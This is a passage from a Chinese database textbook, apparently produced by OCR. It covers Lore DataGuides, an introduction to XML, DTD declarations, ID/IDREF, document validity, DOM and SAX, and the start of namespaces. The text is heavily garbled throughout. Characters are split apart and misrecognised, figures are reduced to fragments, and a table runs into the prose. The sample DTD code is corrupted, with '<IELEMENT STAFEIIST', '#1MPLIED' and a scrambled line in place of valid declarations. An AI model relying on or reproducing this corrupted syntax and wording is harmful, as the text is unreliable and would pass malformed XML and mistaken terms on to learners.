定 要 对 数据 库 的 结构 有 所 了 解 。 遗 憾 的 是 ， 如 前 所 述 ， 半 结构 化 数据 没有 任何 模式 ， 必 须 从 
数据 中 发 现 模式 。Lore 的 一 个 新 特征 就 是 数据 向 导 ( DataGuide) 特征 一 一 一 种 动态 产生 的 、 
保持 数据 库 结构 概 要 的 技术 ,这 是 一 种 动态 模式 ( Goldman 和 Widom，1997，1999 )。 数 据 
向 导 有 三 个 特性 : 

e 简明 性 : 数据 库 中 的 每 个 标记 路 径 只 在 数据 向 导 中 出 现 一 次 。 

e 准确 性 : 数据 向 导 中 的 每 个 标记 路 径 都 在 原始 数据 库 中 存在 。 

e 方便 性 : 数据 向 导 是 一 个 OEM (或 XML) 对 象 ， 因 此 可 以 使 用 与 源 数据 库 同样 的 技 

术 来 存储 和 访问 。 

图 30-3 提供 图 30-2 所 示 数 据 的 一 个 数据 向 导 。 使 用 这 样 一 个 数据 向 导 ， 假 设 其 中 最 多 
只 有 个 对 象 ， 可 以 判断 一 个 长 度 为 n 的 给 定 标 记 路 径 是 否 在 源 数据 库 中 存在 。 例 如 ， 为 了 
验证 图 30-2 中 是 否 存 在 路 径 Staff.Oversees.annualRent， 仅 需要 检查 图 30-3 所 示 数 据 向 导 中 
的 对 象 &19、&21、&22 的 出 边 。 类 似 地 ， 如 果 在 数据 向 导 中 遍历 了 标记 路 径 1 的 一 个 实例 
后 到 达 对 象 &0， 则 &0 的 所 有 出 边 上 的 标记 表示 源 数据 库 中 所 有 可 能 后 跟 于 1 的 标记 。 例 
如 ， 在 图 30-3 中 唯一 可 能 跟 在 Branch 后 面 的 对 象 是 对 象 &20 的 两 个 出 边 。 

给 数据 向 导 添 加 注释 是 非常 有 用 的 ， 例 如 ， 存 储 通过 路 径 标记 1 所 到 达 的 数据 库 的 值 。 
然而 ， 考 虑 在 图 30-4 中 的 两 个 数据 向 导 片 段 ， 它 对 例子 30.1 进行 了 扩展 ， 把 street 表示 为 
number 和 name。 如 果 在 图 30-4a 中 给 对 象 &26 添加 一 个 注释 ， 那 么 该 注释 到 底 作 用 于 标记 
Branch.street 还 是 标记 PropertyForRent.street 呢 ? 另 一 方面 ， 图 30-4b 中 给 对 象 &26 附加 一 
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个 注释 则 没有 歧义 。 这 类 数据 向 导 也 称 为 强 ( strong) 数据 向 导 。 不 严格 地 说 ， 一 个 强 数 据 
向 导 就 是 在 数据 向 导 中 共享 同一 (单一 ) 目标 集 (本 例 中 即 对 象 &26 ) 的 每 一 组 路 径 标记 在 
源 数 据 库 中 也 共享 同一 目标 。 图 30-4a 不 是 一 个 强 数据 向 导 ， 而 图 30-4b 是 。 一 个 强 数 据 向 
导 人 允许 一 个 无 歧义 的 注释 存储 ， 并 且 有 助 于 查询 处 理 和 模式 的 渐 增 式 维护 。 在 30.4.1 节 ， 将 
讨论 怎样 对 Lore 和 Lorel 进行 扩展 以 处 理 XML 。 


DreamHome 






Branch 
PropertyForRent 









ManagerOf 


&20 ,| Manager 


Street 


OverseenBy 


&21 ， Oversees 822 


图 30-3 与 图 30-2 相对 应 的 数据 向 导 


DreamHome DreamHome 







Branch PropertyForRent PropertyForRent 


street street street 


number name number name number name 


a) 一 个 弱 数据 向 导 b) 一 个 强 数 据 向 导 
图 30-4 两 个 数据 向 导 片 段 


30.2 XML 简介 


目前 大 多 数 Web 文档 都 用 HTML 存储 或 传输 。 如 前 所 述 ，HTML 的 一 大 优点 就 是 十 
分 简单 ， 多 数 用 户 都 可 以 使 用 。 然 而 ， 从 另 一 方面 来 说 ，HTML 的 简单 性 又 是 它 的 一 个 缺 
点 ， 因 为 越 来 越 多 的 用 户 需要 标记 简化 某 些 任务 ， 并 使 HTML 文档 更 具有 吸引 力 和 动态 特 
性 。 为 了 满足 这 种 需要 ， 浏 览 器 开发 商 引 入 了 一 些 自己 专用 的 HTML 标记 。 这 又 使 得 开发 
复杂 、 广 泛 可 视 的 Web 文档 更 加 困难 。 为 了 避免 这 样 的 情况 ，W3C 又 推出 了 一 个 新 的 标准 ， 
被 称 为 可 扩展 标记 语言 (XML)， 它 保留 了 一 般 的 应 用 独立 性 ， 正 是 这 种 独立 性 使 HTML 可 
移植 、 更 强大 。XML1.0 (第 二 版 ) 于 2000 年 10 月 成 为 W3C 推荐 标准 (W3C，2000b), 而 
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支持 UNICODE 3 的 XML1.1 (第 二 版 ) 于 2006 年 8 月 成 为 W3C 推荐 标准 (W3C，2006a)。 
XML1.0 (第 五 版 ) 在 2008 年 12 月 成 为 W3C 推荐 标准 ， 并 且 除 了 需要 XML1.1 的 专 有 特性 
的 情况 外 ，XML1.0 (第 五 版 ) 倾向 为 推荐 版 本 。 
XML | 一 种 元 语言 (描述 其 他 语言 的 语言 )， 设 计 者 使 用 它 可 以 定制 自己 的 标记 ， 提 供 
HTML 中 没有 的 功能 。 


XML 是 SGML ( Standard Generalized Markup Language， 标 准 通用 标记 语言 ) 的 一 个 受 
限 版 本 ， 主 要 是 为 Web 文档 设计 的 。 例 如 ，XML 支持 指向 多 个 文档 的 链接 ， 而 不 像 HTML 
连接 那样 只 能 引用 一 个 目标 文档 。 

SGML 是 一 种 用 来 定义 结构 化 文档 类 型 和 表现 这 些 文档 类 型 实例 的 标记 语言 的 系统 
(ISO，1986 )。 在 过 去 十 多 年 里 ，SGML 一 直 作 为 一 种 标准 的 、 独 立 于 开发 商 的 方法 来 存储 
结构 化 文档 。SGML 允许 文档 被 逻辑 地 分 为 两 个 部 分 : 一 个 部 分 定义 了 文档 结构 ， 男 一 部 分 
包含 了 数据 本 身 。 文 档 结构 定义 也 被 称 为 文档 类 型 定义 (Document Type Definition，DTD ) 。 
给 文档 一 个 单独 定义 的 结构 ， 并 允许 文档 设计 者 定制 结构 ， 使 SGML 成 为 极 强 大 的 文档 管 
理 系 统 。 然 而 ， 由 于 其 固有 的 复杂 性 ，SGML 并 没有 被 广泛 使 用 。 

XML 努力 提供 与 SGML 相似 的 功能 ， 但 它 没有 SGML 那么 复杂 ， 与 此 同时 ， 网 络 迅 速 
普及 。 重 要 的 是 ，XML 保持 了 SGML 在 扩展 性 、 结 构 和 有 效 性 方面 的 优势 。 既 然 XML 是 
SGML 的 一 种 受 限 形式 ， 那 么 所 有 兼容 SGML 的 系统 就 可 以 直接 读 取 XML 文档 (虽然 反 
之 不 真 ) 。 但 是 ，XML 本 身 并 不 是 为 了 取代 SGML 而 出 现 的 ， 同 样 ，XML 也 不 是 为 了 取代 
HTML ( HTML 本 身 也 基于 SGML ) 而 出 现 的 。 相 反 ，XML 是 作为 HTML 的 一 种 补充 ， 使 
得 不 同类 型 的 数据 可 以 在 网 络 上 方便 地 交换 。 事 实 上 ，XML 的 使 用 绝 不 仅 限 于 文本 标记 ， 
而 是 可 以 扩展 到 使 用 音频 标记 和 图 像 标 记 。 用 XML 创建 的 众多 语言 中 三 种 流行 的 语言 是 
MathML (Mathematics Markup Language， 数 学 标记 语言 )、SMIL (Synchronized Multimedia 
Integration Language， 同 步 多 媒体 集成 语言 ) 和 CML (Chemistry Markup Language， 化 学 标 
记 语 言 )。 

从 W3C 于 1998 年 正式 推出 XML 1.0 至 今 ， 虽 然 对 XML 的 研究 不 过 十 多 年 时 间 ， 但 
它 已 经 影响 了 IT 行业 的 许多 领域 ， 包 括 图 形 接口 、 嵌 入 式 系统 、 分 布 式 系 统 和 数据 库 管理 
系统 。 例 如 ， 由 于 XML 能 描述 数据 的 结构 ， 那 么 它 也 就 可 以 成 为 定义 异 构 数 据 库 和 数据 源 
结构 的 有 用 机 制 。 有 了 这 种 定义 整个 数据 库 模 式 的 能 力 ，XML 就 可 以 用 来 提取 Oracle 模式 
的 内 容 ， 并 将 其 转换 为 Informix 或 Sybase 模式 。 表 30-1 XML 的 优点 

XML 已 经 成 为 了 一 种 用 于 软件 行业 数据 交换 的 简单 性 
事实 标准 ， 并 将 迅速 取代 EDI (电子 数据 交换 ) 系统 一 一 二 了 
成 为 一 种 用 于 行业 间 交 换 数据 的 主要 媒介 。 一 些 分 析 “可 扩展 竹 
家 相信 ， 无 论 是 在 线 还 是 离线 Internet，XML 都 将 成 可 重用 
为 一 种 可 以 用 来 创建 和 存储 大 多 数 文档 的 语言 。 内 容 与 表示 分 离 

本 节 将 稍 详细 地 讨论 XML ， 并 考虑 如 何 为 XML 改善 的 负载 平衡 
定义 模式 。 下 一 节 将 介绍 XML 的 查询 语言 。 首 先 介 支持 多 数据 源 的 数据 集成 
绍 一 下 XML 的 优点 。 能 撒 述 来 自 多 种 应 用 程序 的 数据 

XML 的 优点 更 先进 的 搜索 引擎 

表 30-1 列 出 了 在 Web 上 使 用 XML 的 一 些 优点 ， 新 的 机 遇 
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简 述 如 下 : 

e 简单 性 。XML 是 一 个 相对 简单 的 标准 ， 总 共 不 到 65 页 。XML 是 一 种 基于 文本 的 语 

言 ， 并 且 易 读 、 清 晰 。 

开放 标准 并 独立 于 平台 / 供应 商 。XML 既 与 平台 独立 又 与 供应 商 独立 ， 是 SGML 的 

一 种 受 限 形式 ， 并 且 是 ISO 标准 。 它 还 基于 ISO 10646， 即 Unicode 字符 集 ， 因 此 

它 支持 世界 上 所 有 的 字符 ， 甚 至 还 提供 了 方法 用 于 说 明 使 用 的 是 哪 一 种 语言 和 编码 。 

可 扩展 性 。XML 不 像 HTML， 它 能 够 扩展 ， 支 持 用 户 定义 自己 的 标记 来 满足 用 户 应 

用 程序 的 需求 。 

可 重用 。 可 扩展 性 允许 一 次 建立 XML 标记 库 而 被 多 个 应 用 程序 重用 。 

内 容 与 表示 分 离 : XML 将 文档 的 内 容 和 文档 的 显示 (如 用 浏览 器 显示 ) 分开。 定制 

数据 视图 十 分 方便 一 一 数据 可 以 通过 浏览 器 传 给 客户 ， 使 用 浏览 器 就 可 以 按 用 户 的 

需求 或 配置 定制 所 显示 数据 。Java 有 时 也 被 称 为 是 一 种 “只 写 一 次 ， 随 处 运行 ”的 

语言 ， 同 样 ，XML 也 是 一 种 “只 写 一 次 ， 随 处 发 布 ” 的 语言 ， 通 过 使 用 样式 表单 ， 

相同 的 XML 文档 可 以 用 不 同 的 格式 和 媒体 来 发 布 。 

e 改善 的 负载 平衡 。 数 据 能 被 传送 到 桌面 浏览 器 中 进行 本 地 计算 ， 从 而 减轻 了 服务 器 
的 计算 负担 ， 负 载 平 衡 有 所 改善 。 

@ 支持 多 数据 源 的 数据 集成 。 从 多 个 数据 源 中 集成 数据 是 十 分 困难 和 耗 时 的 。 但 是 ， 

XML 使 不 同 数据 源 的 数据 合并 更 容易 。 软 件 代理 可 以 从 后 端 数据 库 以 及 其 他 应 用 

程序 中 集成 数据 ， 然 后 再 将 数据 传送 给 其 他 客户 端 或 服务 器 以 支持 进一步 的 处 理 或 

展现 。 

能 描述 来 自 多 种 应 用 程序 的 数据 。XML 是 可 扩展 的 ， 它 可 以 用 来 描述 存放 在 多 种 应 

用 程序 中 的 数据 。 而 且 ，XML 的 数据 是 自 描述 的 ， 数据 可 以 被 接收 和 处 理 而 不 需要 

一 个 内 置 的 数据 描述 。 

@ 更 先进 的 搜索 引擎 。 当 前 ， 搜 索引 擎 主要 是 根据 HTML 中 的 元 标记 信息 或 一 个 关键 
字 与 另 一 个 关键 字 的 相似 性 来 工作 。 有 了 XML ， 搜 索引 人 擎 就 可 以 只 是 简单 分 析 描述 
意义 上 的 标记 即 可 。 

e 新 的 机 遇 。 或 许 XML 最 大 的 优点 之 一 就 在 于 这 种 新 技术 所 带 来 的 巨大 机 遇 ， 在 本 节 
中 我 们 会 加 以 讨论 。 


30.2.1 XML 概览 


本 节 将 用 图 30-5 中 所 示 的 简单 例子 来 简介 一 下 XML， 该 例 表 示 员 工 的 详细 信息 。 

XML 声明 

一 份 XML 文档 由 一 个 可 选 的 XML 声明 开始 ， 在 图 30-5 中 所 示 的 声明 部 分 给 出 所 使 用 
的 XML 的 版 本 (1.0 )、 所 使 用 的 编码 系统 (Unicode UTF-8 ) 以 及 是 否 引用 外 部 的 标记 声明 
(standalone=“no” 表 示 下 面 的 文档 需要 根据 一 个 分 离 的 DTD 文档 进行 核对 )。 图 30-5 中 的 
XML 文档 第 二 行 和 第 三 行 与 样式 表 和 DTD 相关 ， 稍 后 讨论 。 

元 素 

元 素 或 标记 (tag)， 是 最 通用 的 标记 形式 。 第 一 个 元 素 是 根 元 素 ， 它 包含 了 其 他 子 元 
素 。 一 个 XML 文档 必须 有 根 元 素 ， 此 例 中 是 元 素 <STAFFLIST>。 元 素 以 开始 标记 开始 (如 
<STAFF>)， 以 结束 标记 结束 (如 </STAFF>)。XML 元 素 对 大 小 写 敏感 ， 所 以 元 素 <STAFF> 
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与 元 素 <staff> 是 不 同 的 (这 与 HTML 不 同 )。 元 素 还 可 以 是 空 的 ， 在 这 种 情况 下 标记 可 缩 
写 为 <EMPTYELEMENT/>。 元 素 必须 正确 租 和 信 ， 以 下 是 从 图 30-5 中 抽取 的 一 部 分 : 





图 30-5 用 XML 显示 员工 信息 的 例子 
<STAFF> 
<NAME> 
<FNAME>John</FNAME> <LNAME>White</LNAME> 
</NAME> 
</STAFF> 
在 此 ， 元 素 NAME 完全 岁 套 在 元 素 STAFF 中 ,元 素 FNAME 和 LNAME 嵌 套 在 元 素 
NAME 中 。 
属性 
属性 是 包含 元 素描 述 信息 的 名 - 值 对 。 属 性 开始 标记 (名 ) 跟 在 对 应 元 素 名 后 面 ， 属 性 
值 用 引号 标 出 。 例 如 ， 如 果 要 表示 员工 所 在 分 公司 这 个 信息 ， 则 在 元 素 STAFF 中 使 用 属性 
branchNo: 


<STAFF branchNo = "B005"> 

同样 也 可 以 用 STAFF 子 元 素 的 方式 来 表示 分 公司 信息 。 如 果 要 表示 员工 的 性 别 ， 也 可 
以 使 用 一 个 空 元 素 的 属性 ， 例 如 : 

<SEX gender = "M"/> 

一 个 给 定 的 属性 在 一 个 标记 里 只 可 以 出 现 一 次 ， 但 是 在 同一 标记 的 不 同 子 元 素 中 可 以 重 
复出 现 。 注 意 ， 此 处 存在 二 义 一 一 分 公司 或 性 别 的 信息 到 底 应 表示 为 元 素 还 是 属性 呢 ? 

实体 引用 

实体 有 三 个 主要 的 用 途 : 
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e 作为 经 常 重复 出 现 的 文本 的 快速 引用 方式 或 纳入 外 部 文件 的 内 容 。 
。 将 任意 的 Unicode 字符 插入 文本 中 (例如 ， 表 示 那 些 用 键盘 无 法 直接 键入 的 字符 )。 
e 将 保留 符 与 内 容 区 分 开 。 例 如 ， 左 尖 插 号 (<) 表明 了 一 个 元 素 的 开始 标记 或 结束 标 
记 的 开始 。 为 了 将 这 个 符号 与 实际 内 容 分 开 ，XML 引入 实体 Tt， 它 将 由 符号 “<” 
替换 。 
每 一 个 实体 都 必须 有 唯一 的 名 字 ， 其 在 XML 文档 中 的 使 用 被 称 为 实体 引用 。 一 个 实体 
引用 由 “区 ”符号 开始 ， 以 分 号 (;) 结束 ， 例 如 &lt;。 
注释 
注释 被 包含 在 <!- - 和 - -> 标记 中 ， 其 中 可 以 包含 除了 字符 串 “ 一 ”之 外 的 任意 数据 。 
注释 可 以 放 在 XML 文档 中 的 任意 标记 之 间 ， 虽 然 一 个 XML 处 理 器 并 没有 义务 将 这 些 注释 
传 给 应 用 程序 。 
CDATA 节 和 处 理 指令 
一 个 CDATA 节 指 示 XML 处 理 器 忽略 标记 字符 ， 并 将 所 包含 的 字符 不 经 解释 就 传 给 应 
用 程序 。 处 理 指 令 也 可 用 来 为 应 用 程序 提供 信息 。 处 理 指 令 的 形式 是 <?name pidata?>， 其 
中 name 指出 给 应 用 程序 的 处 理 指令 。 由 于 指令 是 应 用 程序 专 有 的 ， 一 个 XML 文档 可 能 有 
多 个 处 理 指 令 来 告诉 不 同 的 应 用 程序 做 相同 的 事情 ， 但 是 方式 可 能 不 同 。 
排序 
在 30.1 节 中 描述 的 半 结 构 化 数据 模型 假定 集合 中 的 元 素 是 无 序 的 ， 而 在 XML 中 元 素 是 
有 序 的 。 因 此 ,在 XML 中， 下面 两 个 部 分 中 元 素 FNAME 和 元 素 LNAME 是 不 同 的 : 


<NAME> <NAME> 
<FNAME>John</FNAME> <LNAME>White</LNAME> 
<LNAME>White</LNAME> <FNAME>John</FNAME> 
</NAME> </NAME> 


相 比 之 下 ，XML 中 的 属性 是 没有 顺序 的 ， 所 以 下 面 两 个 XML 元 素 是 一 样 的 。 


<NAME FNAME = "John" LNAME = "White"/> 
<NAME LNAME = "White" FNAME = "John"/> 


30.2.2 文档 类 型 定义 
| 文档 类 型 定义 (DTD)| 定义 XML 文档 的 合法 语法 。 


文档 类 型 定义 (DTD ) 通过 列 出 可 以 在 文档 中 出 现 的 元 素 名 字 、 指 明 哪 个 元 素 可 以 与 另 
外 哪些 元 素 组 合 、 元 素 怎 样 能 套 、 每 个 元 素 类 型 的 所 有 可 用 属性 等 来 定义 XML 文档 的 合法 
语法 。 术 语 “ 词 汇 表 ”( vocabulary) 有 时 被 用 来 引出 在 特定 的 应 用 程序 中 使 用 的 元 素 。 通 过 
EBNF (Extended Backus-Naur Form) 指定 语法 ， 而 不 是 XML 语法 。 尽 管 DTD 是 可 选 的 ， 
正如 下 面 所 述 ， 但 是 为 了 文档 的 一 致 性 ， 还 是 建议 使 用 它 。 

为 了 继续 描述 公司 员工 的 例子 ， 图 30-6 给 出 了 图 30-5 例子 中 XML 文档 的 一 个 可 能 的 
DTD。 虽 然 DTD 也 可 被 谍 人 到 XML 文档 中 ， 在 此 将 其 定义 为 一 个 分 离 的 外 部 文件 。DTD 
有 四 种 声明 : 元 素 类 型 声明 、 属 性 列表 声明 、 实 体 声 明和 符号 声明 ， 下 面 进行 说 明 。 

元 素 类 型 声明 

元 素 类 型 声明 确定 在 XML 文档 中 出 现 的 元 素 的 规则 。 例 如 ， 在 图 30-6 中 ， 指 定 了 
STAFFLIST 元 素 的 下 列 规则 (或 称 内 容 模型 ): 
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<IELEMENT STAFEIIST (STAFF)*> 

SOR OEM POR DOB?, SALARY)> A 0 
EEEMENT FNAME (PCDATA)> ns Wa ee 
<IELEMENT LNAME (#PCDATA)> 

<IELEMENT POSITION (#PCDATA)> 

<IELEMENT DOB (#PCDATA)> 

<IELEMENT SALARY (#PCDATA)> 

<IATTLIST STAFF branchNo CDATA #1MPLIED> 


图 30-6 图 30-5 中 XML 文档 的 文档 类 型 定义 


<!IELEMENT STAFFLIST (STAFF)*> 


以 上 声明 表明 了 元 素 STAFFLIST 由 零 个 或 多 个 STAFF 元 素 组 成 。 重 复数 目的 选项 有 以 
下 几 种 ; 

e 星 号 (*) 表明 元 素 的 零 或 多 次 出 现 。 

e 加 号 (+) 表明 元 素 的 一 次 或 多 次 出 现 。 

e 问号 (?) 表明 元 素 要 么 不 出 现 ， 要 么 只 出 现 一 次 。 

一 个 没有 量化 符号 的 名 字 表 示 必 须 出 现 一 次 。 两 个 元 素 之 间 的 逗号 指明 它们 必须 依次 接着 
出 现 ， 如 果 省 去 了 逗号 ， 元 素 就 可 以 按 任 意 顺 序 出 现 。 例 如 ， 为 元 素 STAFF 指定 了 以 下 规则 : 


<!IELEMENT STAFF (NAME, POSITION, DOB?, SALARY)> 


以 上 声明 表示 元 素 STAFF 由 元 素 NAME、 元 素 POSITION、 可 选 的 DOB 元 素 和 一 个 
SALARY 元 素 依 次 顺序 组 成 。 对 FNAME、LNAME、POSITION、DOB 和 SALARY 的 声 
明和 其 他 在 内 容 模型 中 出 现 的 元 素 必须 由 XML 处 理 器 来 验证 文档 是 否 合法 。 用 特殊 符号 
#PCDATA 声明 的 那些 基 元 素 指明 都 是 可 解析 的 字符 数据 。 注 意 一 个 元 素 可 以 只 包含 其 他 元 
素 但 是 也 有 可 能 既 包含 其 他 元 素 又 包含 #PCDATA (也 被 称 为 混合 内 容 )。 

属性 列表 声明 

属性 列表 声明 确定 哪些 元 素 会 有 属性 ， 它 们 会 有 哪些 属性 ， 这 些 属 性 会 有 什么 样 的 属性 
值 ， 属 性 可 选 的 默认 值 又 是 什么 。 每 一 个 属性 声明 由 三 部 分 组 成 : 名 字 、 类 型 及 可 选 的 值 。 
共有 六 种 可 能 的 属性 类 型 : 

e CDATA : 字符 数据 ， 可 以 包含 任何 文字 。 这 些 字符 串 将 不 会 被 XML 处 理 器 解析 ， 
而 是 直接 传送 给 应 用 程序 。 

ID : 用 来 指明 文档 中 的 单个 元 素 。ID 必须 与 一 个 元 素 名 相对 应 ， 在 一 个 文档 中 使 用 
的 所 有 ID 值 必须 是 不 一 样 的 。 

IDREF 或 IDREFS : 必须 与 文档 中 某 个 元 素 的 ID 属性 值 相 对 应 。 一 个 IDREFS 属性 
可 以 包含 多 个 由 空格 分 离 的 IDREF 值 。 

ENTITY 或 ENTITIES : 必须 与 单个 实体 的 名 字 相 对 应 。 另 外 ，ENTITIES 上 可 以 包 
含 多 个 由 空格 分 离 的 ENTITY 值 。 

NMTOKEN 或 NMTOKENS : 受 限 字符 串 形 式 ， 通 常 由 单个 字 组 成 。 一 个 NMTOKENS 
属性 可 以 包含 多 个 由 空格 分 离 的 NMTOKEN 值 。 

NOTATION: 其 值 为 符号 的 名 字 ( 见 下 面 )。 
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e 名 字 列 表 : 一 个 属性 的 可 能 取 值 ( 即 枚 举 类 型 )。 
例如 ， 以 下 的 属性 声明 用 来 定义 元 素 STAFF 的 属性 branchNo: 


<!IATTLIST STAFF branchNo CDATA #IMPLIED> 


这 个 声明 表明 属性 branchNo 的 值 类 型 是 字符 串 类 型 (CDATA 一 一 字符 数据 )， 并 且 
是 可 选 的 ( 抽 MPLIED)， 但 没有 提供 默认 值 。 除 了 抽 MPLIED 外 ，#REQUIRED 也 可 以 用 
来 表示 必须 提供 属性 值 。 如 果 这 两 个 限定 词 都 没有 出 现 ， 则 属性 取 声 明 的 默认 值 。 关 键 字 
#FIXED 用 于 指明 属性 值 必须 是 默认 值 。 再 看 下 面 的 例子 ， 定义 了 一 个 元 素 SEX， 它 包含 属 
性 gender，gender 的 值 是 M (默认 值 ) 或 是 F， 如 下 所 示 : 


<!IATTLIST SEX gender (M | F) "M"> 


实体 和 表示 方法 声明 

实体 声明 将 代表 内 容 的 一 些 片 段 与 一 个 名 字 关 联 起 来 ， 例 如 : 一 段 正 则 文本 、 一 
段 DTD、 或 者 是 对 包含 文本 或 二 进 制 数据 的 外 部 文件 的 引用 。 表 示 方 法 (notation) 声明 
指定 外 部 二 进 制 数据 ，XML 处 理 器 直接 将 这 些 数据 传递 给 应 用 程序 。 例 如 ， 可 以 为 文本 
“DreamHome Estate Agents ”声明 一 个 实体 如 下 : 


<!lENTITY DH "DreamHome Estate Agents"> 


对 外 部 未 解析 实体 的 处 理 是 应 用 程序 的 责任 。 有 关 实 体内 部 格式 的 一 些 信息 必须 在 指明 
实体 的 位 置 以 后 再 声明 ， 例 如 : 


<!ENTITY dreamHomeLogo SYSTEM "dreamhome.jpg" NDATAJPEGFormat> 

<!INOTATION JPEGFormat SYSTEM "http://www.jpeg.org"> 

NDATA 记号 的 出 现 表 明 实 体 是 没有 经 过 解析 的 ， 这 个 记号 后 面 跟随 的 任意 名 字 只 能 是 
接 下 来 表示 方法 声明 的 关键 字 。 与 这 个 名 字 匹 配 的 表示 方法 声明 带 有 一 个 标识 符 ， 应 用 程序 
通过 这 个 标识 符 知道 如 何 处 理 这 个 实体 。 

元 素 实体 、ID 和 ID 引用 

正如 上 面 提 到 的 ，XML 保留 了 一 个 属性 类 型 ID ， 使 一 个 唯一 的 关键 字 与 元 素 相 关联 。 
另外 ， 属 性 类 型 IDREF 允许 元 素 使 用 指定 的 关键 字 引 用 另外 一 个 元 素 ， 属 性 类 型 IDREFS 
允许 元 素 引 用 多 个 元 素 。 例 如 ， 为 了 给 联系 Branch Has Staff 建立 一 个 松散 模型 ， 可 以 为 
STAFF 元 素 和 BRANCH 元 素 定义 以 下 两 个 属性 : 

<IATTLIST STAFF staffNo ID #REQUIRED> 

<IATTLIST BRANCH staff IDREFS #IMPLIED> 

图 30-7 中 可 以 看 到 这 些 属性 的 使 用 。 

文档 有 效 性 

XML 规范 定义 了 两 个 文档 处 理 级 别 : 合式 的 和 合法 的 。 无 验证 的 处 理 器 确保 一 个 XML 
文档 中 的 信息 在 传送 给 应 用 程序 之 前 是 合式 的 。 符 合 XML 结构 和 表示 方法 规则 的 XML 文 
档 被 认为 是 合式 (well-formed) 的 。 合 式 的 XML 文档 必须 符合 下 列 规则 : 

e 文档 必须 以 XML 声明 <?xml version“1.0”?> 开始 。 

e 所 有 的 元 素 必 须 被 包含 在 一 个 根 元 素 中 。 

e 元 素 必 须 无 重奏 地 肉 套 在 树 型 结构 中 。 

e 所 有 非 空 元 素 必须 有 开始 标记 和 结束 标记 。 
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<STAFF staffNo = "SL21"> 
<FNAME>John</FNAME><LNAME>White</LNAME> 





<BRANCH sta 任 = "SL21 SL41"> 
<BRANCHNO>B005</BRANCHNO> 
</BRANCH> 


图 30-7 使 用 ID 和 IDREFS 的 示例 


一 个 带 验证 的 处 理 器 不 仅仅 要 检验 一 个 XML 文档 是 否 是 合式 的 ， 而 且 还 要 检验 其 是 
否 符合 一 个 DTD ,在 这 种 情况 下 XML 文档 才能 被 看 成 是 合法 的 。 如 前 所 述 ，DTD 可 以 包 
含 于 XML 文档 内 或 者 另外 引用 它 。W3C 目前 推出 了 一 种 比 DTD 更 易于 表达 的 形式 ， 称 为 
XML 模式 ( Schema)。 在 介绍 XML Schema 之 前 ， 先 介绍 其 他 一 些 在 XML Schema 中 将 使 
用 的 与 XML 相关 的 技术 。 


30.3 XML 相关 技术 


本 节 将 简要 介绍 一 些 XML 的 相关 技术 ， 它 们 对 于 理解 和 开发 XML 应 用 程序 至 关 重 要 ， 
这 些 技术 即 文档 对 象 模型 (Document Object Model，DOM)、XML 简单 的 API (Simple API for 
XML，SAX)、 命 名 空间 、 可 扩展 样式 表 语 言 (eXtensible Stylesheet Language，XSL)、 用 于 转 
换 的 可 扩展 样式 表 语 言 (eXtensible Stylesheet Language for Transformations, XSLT)、XML 
路 径 语言 (XML Path Language，XPath)、XML 指针 语言 (XML Pointer Language，XPointer)、 
XML 链接 语言 (XML Linking Language，XLink)、XHTML 、 简 单 对 象 访问 协议 〈 Simple Object 
Access Protocol，SOAP)、Web 服务 描述 语言 ( Web Services Description Language，WSDL ) 
和 统一 资源 描述 发 现 和 集成 (Universal Discovery，Description and Integration, UDDI)。 


30.3.1 DOM 和 SAX 接口 


XML API 共有 两 种 类 型 : 基于 树 的 和 基于 事件 的 。DOM ( Document Object Model, 文 
档 对 象 模 型 ) 是 XML 基于 树 的 API， 它 提供 了 一 些 面向 对 象 的 数据 视图 。 这 个 API 由 W3C 
提出 ， 描 述 了 一 系列 与 平台 和 语言 都 无 关 的 接口 ， 这 些 接口 可 以 用 来 表示 合式 的 XML 或 者 
HTML 文档 。DOM 在 内 存 中 为 XML 文档 构建 了 一 个 树 形 表示 ， 并 提供 了 相应 的 类 和 方法 
使 应 用 程序 可 以 遍历 和 处 理 这 棵 树 。DOM 定义 了 一 个 Node 接口 ， 其 中 包括 子 类 Element、 
Attribute 和 Character-Data。Node 接口 中 包括 访问 一 个 结 点 的 组 件 的 方法 ， 如 parentNode()， 
它 返回 该 结 点 的 父 结 点 ， 以 及 childNode()， 它 返回 该 结 点 的 一 组 子 结 点 。 总 之 ，DOM 接口 
是 对 XML 树 结构 进行 操作 的 最 有 用 的 接口 ， 可 以 通过 该 接口 插入 或 删除 一 个 元 素 ， 重 新 对 
元 素 进行 排序 ， 等 等 。 

30-8 是 对 图 30-5 中 的 XML 文档 的 一 个 树 形 表示 。 注 意图 30-2 中 的 OEM 图 表示 与 
这 种 XML 表示 的 细微 区 别 。 在 OEM 表示 中 ， 图 中 的 标签 在 边 上 ， 而 在 这 种 XML 表示 中 ， 
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图 中 的 标签 在 结 点 上 。 当 数据 是 层次 结构 时 ， 很 容易 将 一 种 表示 转换 成 另外 一 种 表示 ， 然 而 
当 数 据 为 图 时 ， 转 换 稍微 困难 一 些 。 






1945-10-01 30000 





Manager 


jb White 
图 30-8 图 30-5 中 的 XML 文档 的 树 结构 表示 


SAX (Simple API for XML) 是 XML 的 一 个 基于 事件 的 、 顺 序 访问 的 API， 它 使 用 回调 
来 向 应 用 程序 报告 分 析 的 事件 。 例 如 ， 对 开始 和 结束 元 素 存在 的 事件 。 应 用 程序 通过 定制 的 事件 
处 理 函 数 来 处 理 这 些 事 件 。 与 基于 树 的 API 不 同 ， 基 于 事件 的 API 并 没有 为 XML 文档 构建 一 个 
内 存 中 的 树 表 示 。 这 个 API 实际 上 是 XML-DEYV 邮件 列表 上 合作 开发 的 产品 ， 而 不 是 W3C 的 。 


30.3.2 ”命名 空间 


命名 空间 限定 了 XML 文档 中 元 素 名 及 其 联系 ， 以 避免 在 不 同 词汇 表 定 义 的 元 素 具 有 同 
样 的 名 字 而 造成 冲突 。 这 使 得 多 个 命名 空间 中 的 标记 可 以 混合 使 用 ， 这 对 于 来 自 不 同 数据 源 
的 数据 情况 至 关 重 要 。 命 名 空间 也 包含 在 W3C 的 一 个 标准 建议 中 ( W3C，1999b，2009 ) 。 
为 了 达到 唯一 性 ， 元 素 和 属性 使 用 URI 引用 来 获得 全 球 唯一 的 名 字 。 例 如 ， 以 下 文档 片段 
使 用 在 根 元 素 中 声明 的 两 个 不 同 的 命名 空间 。 第 一 个 命名 空间 (“ http://www.dreamhome. 
co.uk/branch5/”) 将 作为 一 个 默认 的 命名 空间 ， 于 是 任何 未 限定 的 元 素 都 假定 来 自 这 个 命名 
空间 。 第 二 个 命名 空间 (“ http://www.dreamhome.co.uk/HQ/”) 被 给 定 了 一 个 名 字 (hq)， 这 
个 名 字 后 来 用 作 SALARY 元 素 的 前 组 来 说 明 这 个 元 素 的 出 处 : 

